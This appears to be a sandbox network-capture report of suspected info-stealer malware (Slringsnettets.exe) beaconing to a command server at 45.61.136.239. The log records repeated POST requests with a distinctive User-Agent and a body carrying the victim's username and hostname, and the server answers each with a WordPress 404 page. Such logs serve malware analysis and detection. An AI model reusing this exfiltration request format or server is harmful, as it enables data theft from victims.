Jul 4, 2024 08:23:42.700789928 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:42.700810909 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49757	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:42.854659081 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:42.862514019 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:45.676078081 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:43 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:45.676100969 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:45.676120996 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:45.676333904 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:45.676347971 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:45.676367044 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:45.676379919 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:45.676397085 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:45.676527977 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:45.676697016 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:45.825819016 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:45.830709934 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:49.112498045 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:46 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:49.112524033 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:49.112550974 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:49.112602949 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:49.112615108 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:49.112771034 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:49.112781048 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:49.112796068 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:49.112952948 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:49.112965107 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49759	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:49.262815952 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:49.267667055 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:52.422794104 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:49 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:52.422821045 CEST	224	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.wi
Jul 4, 2024 08:23:52.422843933 CEST	1236	IN	Data Raw: 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e Data Ascii: dth,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canv
Jul 4, 2024 08:23:52.422868967 CEST	224	IN	Data Raw: 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 Data Ascii: tingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pars
Jul 4, 2024 08:23:52.422921896 CEST	1236	IN	Data Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
Jul 4, 2024 08:23:52.422941923 CEST	1236	IN	Data Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !importan
